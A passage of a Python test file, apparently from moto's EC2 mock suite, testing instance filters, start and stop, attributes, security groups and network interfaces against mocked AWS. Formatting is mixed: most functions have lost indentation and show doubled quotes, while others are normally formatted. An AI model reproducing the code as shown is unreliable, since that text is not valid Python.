[instance2.id], filters={""instance-state-name"": ""running""}
)
reservations.should.have.length_of(1)
instance_ids = [instance.id for instance in reservations[0].instances]
instance_ids.should.equal([instance2.id])
reservations = conn.get_all_reservations(
[instance2.id], filters={""instance-state-name"": ""terminated""}
)
list(reservations).should.equal([])
# get_all_reservations should still return all 3
reservations = conn.get_all_reservations()
reservations[0].instances.should.have.length_of(3)
conn.get_all_reservations.when.called_with(
filters={""not-implemented-filter"": ""foobar""}
).should.throw(NotImplementedError)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
reservations = conn.get_all_reservations(filters={""instance-id"": instance1.id})
# get_all_reservations should return just instance1
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={""instance-id"": [instance1.id, instance2.id]}
)
# get_all_reservations should return two
reservations[0].instances.should.have.length_of(2)
reservations = conn.get_all_reservations(filters={""instance-id"": ""non-existing-id""})
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_type():
conn = boto.connect_ec2()
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")
instance1 = reservation1.instances[0]
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""m1.small"")
instance2 = reservation2.instances[0]
reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")
instance3 = reservation3.instances[0]
reservations = conn.get_all_reservations(filters={""instance-type"": ""m1.small""})
# get_all_reservations should return instance1,2
reservations.should.have.length_of(2)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]
set(instance_ids).should.equal(set([instance1.id, instance2.id]))
reservations = conn.get_all_reservations(filters={""instance-type"": ""t1.micro""})
# get_all_reservations should return one
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(
filters={""instance-type"": [""t1.micro"", ""m1.small""]}
)
reservations.should.have.length_of(3)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
reservations[2].instances.should.have.length_of(1)
instance_ids = [
reservations[0].instances[0].id,
reservations[1].instances[0].id,
reservations[2].instances[0].id,
]
set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))
reservations = conn.get_all_reservations(filters={""instance-type"": ""bogus""})
# bogus instance-type should return none
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_reason_code():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
reservations = conn.get_all_reservations(
filters={""state-reason-code"": ""Client.UserInitiatedShutdown""}
)
# get_all_reservations should return instance1 and instance2
reservations[0].instances.should.have.length_of(2)
set([instance1.id, instance2.id]).should.equal(
set([i.id for i in reservations[0].instances])
)
reservations = conn.get_all_reservations(filters={""state-reason-code"": """"})
# get_all_reservations should return instance 3
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_source_dest_check():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
conn.modify_instance_attribute(
instance1.id, attribute=""sourceDestCheck"", value=False
)
source_dest_check_false = conn.get_all_reservations(
filters={""source-dest-check"": ""false""}
)
source_dest_check_true = conn.get_all_reservations(
filters={""source-dest-check"": ""true""}
)
source_dest_check_false[0].instances.should.have.length_of(1)
source_dest_check_false[0].instances[0].id.should.equal(instance1.id)
source_dest_check_true[0].instances.should.have.length_of(1)
source_dest_check_true[0].instances[0].id.should.equal(instance2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_vpc_id():
conn = boto.connect_vpc(""the_key"", ""the_secret"")
vpc1 = conn.create_vpc(""10.0.0.0/16"")
subnet1 = conn.create_subnet(vpc1.id, ""10.0.0.0/27"")
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)
instance1 = reservation1.instances[0]
vpc2 = conn.create_vpc(""10.1.0.0/16"")
subnet2 = conn.create_subnet(vpc2.id, ""10.1.0.0/27"")
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)
instance2 = reservation2.instances[0]
reservations1 = conn.get_all_reservations(filters={""vpc-id"": vpc1.id})
reservations1.should.have.length_of(1)
reservations1[0].instances.should.have.length_of(1)
reservations1[0].instances[0].id.should.equal(instance1.id)
reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)
reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)
reservations2 = conn.get_all_reservations(filters={""vpc-id"": vpc2.id})
reservations2.should.have.length_of(1)
reservations2[0].instances.should.have.length_of(1)
reservations2[0].instances[0].id.should.equal(instance2.id)
reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)
reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_architecture():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1)
instance = reservation.instances
reservations = conn.get_all_reservations(filters={""architecture"": ""x86_64""})
# get_all_reservations should return the instance
reservations[0].instances.should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_image_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{""Name"": ""image-id"", ""Values"": [EXAMPLE_AMI_ID]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_account_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{""Name"": ""owner-id"", ""Values"": [""123456789012""]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_private_dns():
client = boto3.client(""ec2"", region_name=""us-east-1"")
conn = boto3.resource(""ec2"", ""us-east-1"")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"  # matches the ip-10-0-0-1 filter below
)
reservations = client.describe_instances(
Filters=[{""Name"": ""private-dns-name"", ""Values"": [""ip-10-0-0-1.ec2.internal""]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_ni_private_dns():
client = boto3.client(""ec2"", region_name=""us-west-2"")
conn = boto3.resource(""ec2"", ""us-west-2"")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="10.0.0.1"  # matches the ip-10-0-0-1 filter below
)
reservations = client.describe_instances(
Filters=[
{
""Name"": ""network-interface.private-dns-name"",
""Values"": [""ip-10-0-0-1.us-west-2.compute.internal""],
}
]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_name():
client = boto3.client(""ec2"", region_name=""us-east-1"")
client.create_security_group(Description=""test"", GroupName=""test_sg"")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]
)
reservations = client.describe_instances(
Filters=[{""Name"": ""instance.group-name"", ""Values"": [""test_sg""]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
create_sg = client.create_security_group(Description=""test"", GroupName=""test_sg"")
group_id = create_sg[""GroupId""]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=[""test_sg""]
)
reservations = client.describe_instances(
Filters=[{""Name"": ""instance.group-id"", ""Values"": [group_id]}]
)[""Reservations""]
reservations[0][""Instances""].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_subnet_id():
client = boto3.client(""ec2"", region_name=""us-east-1"")
vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")
subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")
resp = client.create_vpc(CidrBlock=str(vpc_cidr),)
vpc_id = resp[""Vpc""][""VpcId""]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp[""Subnet""][""SubnetId""]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,
)
reservations = client.describe_instances(
Filters=[{""Name"": ""subnet-id"", ""Values"": [subnet_id]}]
)[""Reservations""]
reservations.should.have.length_of(1)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag(""tag1"", ""value1"")
instance1.add_tag(""tag2"", ""value2"")
instance2.add_tag(""tag1"", ""value1"")
instance2.add_tag(""tag2"", ""wrong value"")
instance3.add_tag(""tag2"", ""value2"")
reservations = conn.get_all_reservations(filters={""tag:tag0"": ""value0""})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={""tag:tag1"": ""value1""})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={""tag:tag1"": ""value1"", ""tag:tag2"": ""value2""}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(filters={""tag:tag2"": [""value2"", ""bogus""]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_value():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag(""tag1"", ""value1"")
instance1.add_tag(""tag2"", ""value2"")
instance2.add_tag(""tag1"", ""value1"")
instance2.add_tag(""tag2"", ""wrong value"")
instance3.add_tag(""tag2"", ""value2"")
reservations = conn.get_all_reservations(filters={""tag-value"": ""value0""})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={""tag-value"": ""value1""})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={""tag-value"": [""value2"", ""value1""]}
)
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(filters={""tag-value"": [""value2"", ""bogus""]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_name():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag(""tag1"")
instance1.add_tag(""tag2"")
instance2.add_tag(""tag1"")
instance2.add_tag(""tag2X"")
instance3.add_tag(""tag3"")
reservations = conn.get_all_reservations(filters={""tag-key"": ""tagX""})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={""tag-key"": ""tag1""})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(filters={""tag-key"": [""tag1"", ""tag3""]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_instance_start_and_stop():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instances = reservation.instances
instances.should.have.length_of(2)
instance_ids = [instance.id for instance in instances]
with pytest.raises(EC2ResponseError) as ex:
stopped_instances = conn.stop_instances(instance_ids, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set""
)
stopped_instances = conn.stop_instances(instance_ids)
for instance in stopped_instances:
instance.state.should.equal(""stopping"")
with pytest.raises(EC2ResponseError) as ex:
started_instances = conn.start_instances([instances[0].id], dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set""
)
started_instances = conn.start_instances([instances[0].id])
started_instances[0].state.should.equal(""pending"")
@mock_ec2_deprecated
def test_instance_reboot():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.reboot(dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set""
)
instance.reboot()
instance.state.should.equal(""pending"")
@mock_ec2_deprecated
def test_instance_attribute_instance_type():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""instanceType"", ""m1.small"", dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""instanceType"", ""m1.small"")
instance_attribute = instance.get_attribute(""instanceType"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""instanceType"").should.equal(""m1.small"")
@mock_ec2_deprecated
def test_modify_instance_attribute_security_groups():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
sg_id = conn.create_security_group(
""test security group"", ""this is a test security group""
).id
sg_id2 = conn.create_security_group(
""test security group 2"", ""this is a test security group 2""
).id
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""groupSet"", [sg_id, sg_id2], dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""groupSet"", [sg_id, sg_id2])
instance_attribute = instance.get_attribute(""groupSet"")
instance_attribute.should.be.a(InstanceAttribute)
group_list = instance_attribute.get(""groupSet"")
any(g.id == sg_id for g in group_list).should.be.ok
any(g.id == sg_id2 for g in group_list).should.be.ok
@mock_ec2_deprecated
def test_instance_attribute_user_data():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""userData"", ""this is my user data"", dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""userData"", ""this is my user data"")
instance_attribute = instance.get_attribute(""userData"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""userData"").should.equal(""this is my user data"")
@mock_ec2_deprecated
def test_instance_attribute_source_dest_check():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
# Default value is true
instance.sourceDestCheck.should.equal(""true"")
instance_attribute = instance.get_attribute(""sourceDestCheck"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""sourceDestCheck"").should.equal(True)
# Set to false (note: Boto converts bool to string, eg 'false')
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute(""sourceDestCheck"", False, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set""
)
instance.modify_attribute(""sourceDestCheck"", False)
instance.update()
instance.sourceDestCheck.should.equal(""false"")
instance_attribute = instance.get_attribute(""sourceDestCheck"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""sourceDestCheck"").should.equal(False)
# Set back to true
instance.modify_attribute(""sourceDestCheck"", True)
instance.update()
instance.sourceDestCheck.should.equal(""true"")
instance_attribute = instance.get_attribute(""sourceDestCheck"")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get(""sourceDestCheck"").should.equal(True)
@mock_ec2_deprecated
def test_user_data_with_run_instance():
user_data = b""some user data""
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)
instance = reservation.instances[0]
instance_attribute = instance.get_attribute(""userData"")
instance_attribute.should.be.a(InstanceAttribute)
retrieved_user_data = instance_attribute.get(""userData"").encode(""utf-8"")
decoded_user_data = decode_method(retrieved_user_data)
decoded_user_data.should.equal(b""some user data"")
@mock_ec2_deprecated
def test_run_instance_with_security_group_name():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
with pytest.raises(EC2ResponseError) as ex:
group = conn.create_security_group(""group1"", ""some description"", dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set""
)
group = conn.create_security_group(""group1"", ""some description"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=[""group1""])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal(""group1"")
@mock_ec2_deprecated
def test_run_instance_with_security_group_id():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
group = conn.create_security_group(""group1"", ""some description"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal(""group1"")
@mock_ec2_deprecated
def test_run_instance_with_instance_type():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type=""t1.micro"")
instance = reservation.instances[0]
instance.instance_type.should.equal(""t1.micro"")
@mock_ec2_deprecated
def test_run_instance_with_default_placement():
conn = boto.ec2.connect_to_region(""us-east-1"")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
instance.placement.should.equal(""us-east-1a"")
@mock_ec2_deprecated
def test_run_instance_with_placement():
conn = boto.connect_ec2(""the_key"", ""the_secret"")
reservation = conn.run_instances(EXAMPLE_AMI_ID, placement=""us-east-1b"")
instance = reservation.instances[0]
instance.placement.should.equal(""us-east-1b"")
@mock_ec2
def test_run_instance_with_subnet_boto3():
client = boto3.client(""ec2"", region_name=""eu-central-1"")
ip_networks = [
(ipaddress.ip_network(""10.0.0.0/16""), ipaddress.ip_network(""10.0.99.0/24"")),
(
ipaddress.ip_network(""192.168.42.0/24""),
ipaddress.ip_network(""192.168.42.0/25""),
),
]
# Tests instances are created with the correct IPs
for vpc_cidr, subnet_cidr in ip_networks:
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy=""default"",
)
vpc_id = resp[""Vpc""][""VpcId""]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp[""Subnet""][""SubnetId""]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp[""Instances""][0]
instance[""SubnetId""].should.equal(subnet_id)
priv_ipv4 = ipaddress.ip_address(six.text_type(instance[""PrivateIpAddress""]))
subnet_cidr.should.contain(priv_ipv4)
@mock_ec2
def test_run_instance_with_specified_private_ipv4():
client = boto3.client(""ec2"", region_name=""eu-central-1"")
vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")
subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy=""default"",
)
vpc_id = resp[""Vpc""][""VpcId""]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp[""Subnet""][""SubnetId""]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID,
MaxCount=1,
MinCount=1,
SubnetId=subnet_id,
PrivateIpAddress=""127.0.0.1"",
)
instance = resp[""Instances""][0]
instance[""SubnetId""].should.equal(subnet_id)
instance[""PrivateIpAddress""].should.equal(""127.0.0.1"")
@mock_ec2
def test_run_instance_mapped_public_ipv4():
    client = boto3.client("ec2", region_name="eu-central-1")
    vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
    subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
    resp = client.create_vpc(
        CidrBlock=str(vpc_cidr),
        AmazonProvidedIpv6CidrBlock=False,
        DryRun=False,
        InstanceTenancy="default",
    )
    vpc_id = resp["Vpc"]["VpcId"]
    resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
    subnet_id = resp["Subnet"]["SubnetId"]
    client.modify_subnet_attribute(
        SubnetId=subnet_id, MapPublicIpOnLaunch={"Value": True}
    )
    resp = client.run_instances(
        ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
    )
    instance = resp["Instances"][0]
    instance.should.contain("PublicDnsName")
    instance.should.contain("PublicIpAddress")
    len(instance["PublicDnsName"]).should.be.greater_than(0)
    len(instance["PublicIpAddress"]).should.be.greater_than(0)
@mock_ec2_deprecated
def test_run_instance_with_nic_autocreated():
    conn = boto.connect_vpc("the_key", "the_secret")
    vpc = conn.create_vpc("10.0.0.0/16")
    subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
    security_group1 = conn.create_security_group(
        "test security group #1", "this is a test security group"
    )
    security_group2 = conn.create_security_group(
        "test security group #2", "this is a test security group"
    )
    # Must be an address inside the subnet CIDR (10.0.0.0/18), not a
    # loopback placeholder.
    private_ip = "10.0.0.1"
    reservation = conn.run_instances(
        EXAMPLE_AMI_ID,
        subnet_id=subnet.id,
        security_groups=[security_group1.name],
        security_group_ids=[security_group2.id],
        private_ip_address=private_ip,
    )
    instance = reservation.instances[0]
    all_enis = conn.get_all_network_interfaces()
    all_enis.should.have.length_of(1)
    eni = all_enis[0]
    instance.interfaces.should.have.length_of(1)
    instance.interfaces[0].id.should.equal(eni.id)
    instance.subnet_id.should.equal(subnet.id)
    instance.groups.should.have.length_of(2)
    set([group.id for group in instance.groups]).should.equal(
        set([security_group1.id, security_group2.id])
    )
    eni.subnet_id.should.equal(subnet.id)
    eni.groups.should.have.length_of(2)
    set([group.id for group in eni.groups]).should.equal(
        set([security_group1.id, security_group2.id])
    )
    eni.private_ip_addresses.should.have.length_of(1)
    eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@mock_ec2_deprecated
def test_run_instance_with_nic_preexisting():
    conn = boto.connect_vpc("the_key", "the_secret")
    vpc = conn.create_vpc("10.0.0.0/16")
    subnet = conn.create_subnet(vpc.id, "10.0.0.0/18")
    security_group1 = conn.create_security_group(
        "test security group #1", "this is a test security group"
    )
    security_group2 = conn.create_security_group(
        "test security group #2", "this is a test security group"
    )
    # Must be an address inside the subnet CIDR (10.0.0.0/18).
    private_ip = "10.0.0.1"
    eni = conn.create_network_interface(
        subnet.id, private_ip, groups=[security_group1.id]
    )
    # Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications...
    # annoying, but generates the desired querystring.
    from boto.ec2.networkinterface import (
        NetworkInterfaceSpecification,
        NetworkInterfaceCollection,
    )

    interface = NetworkInterfaceSpecification(
        network_interface_id=eni.id, device_index=0
    )
    interfaces = NetworkInterfaceCollection(interface)
    # end Boto objects
    reservation = conn.run_instances(
        EXAMPLE_AMI_ID,
        network_interfaces=interfaces,
        security_group_ids=[security_group2.id],
    )
    instance = reservation.instances[0]
    instance.subnet_id.should.equal(subnet.id)
    all_enis = conn.get_all_network_interfaces()
    all_enis.should.have.length_of(1)
    instance.interfaces.should.have.length_of(1)
    instance_eni = instance.interfaces[0]
    instance_eni.id.should.equal(eni.id)
    instance_eni.subnet_id.should.equal(subnet.id)
    instance_eni.groups.should.have.length_of(2)
    set([group.id for group in instance_eni.groups]).should.equal(
        set([security_group1.id, security_group2.id])
    )
    instance_eni.private_ip_addresses.should.have.length_of(1)
    instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)
@requires_boto_gte(""2.32.0"")
@mock_ec2_deprecated
def test_instance_with_nic_attach_detach():
conn = boto.connect_vpc(""the_key"", ""the_secret"")
vpc = conn.create_vpc(""10.0.0.0/16"")
subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")
security_group1 = conn.create_security_group(
""test security group #1"", ""this is a test security group""
)
security_group2 = conn.create_security_group(
""test security group #2"", ""this is a test security group""
)
reservation = conn.run_instances(
EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]
)
instance = reservation.instances[0]
eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])
# Check initial instance and ENI data
instance.interfaces.should.have.length_of(1)
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Attach
with pytest.raises(EC2ResponseError) as ex:
conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""
)
conn.attach_network_interface(eni.id, instance.id, device_index=1)
# Check attached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(2)
instance_eni = instance.interfaces[1]
instance_eni.id.should.equal(eni.id)
instance_eni.groups.should.have.length_of(2)
set([group.id for group in instance_eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]
eni.groups.should.have.length_of(2)
set([group.id for group in eni.groups]).should.equal(
set([security_group1.id, security_group2.id])
)
# Detach
with pytest.raises(EC2ResponseError) as ex:
conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)
ex.value.error_code.should.equal(""DryRunOperation"")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
""An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""
)
conn.detach_network_interface(instance_eni.attachment.id)
# Check detached instance and ENI data
instance.update()
instance.interfaces.should.have.length_of(1)
eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]
eni.groups.should.have.length_of(1)
set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))
# Detach with invalid attachment ID
with pytest.raises(EC2ResponseError) as cm:
conn.detach_network_interface(""eni-attach-1234abcd"")
cm.value.code.should.equal(""InvalidAttachmentID.NotFound"")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ec2_classic_has_public_ip_address():
    conn = boto.connect_ec2("the_key", "the_secret")
    reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name="keypair_name")
    instance = reservation.instances[0]
    instance.ip_address.should_not.equal(None)
    instance.public_dns_name.should.contain(instance.ip_address.replace(".", "-"))
    instance.private_ip_address.should_not.equal(None)
    instance.private_dns_name.should.contain(
        instance.private_ip_address.replace(".", "-")
    )


@mock_ec2_deprecated
def test_run_instance_with_keypair():
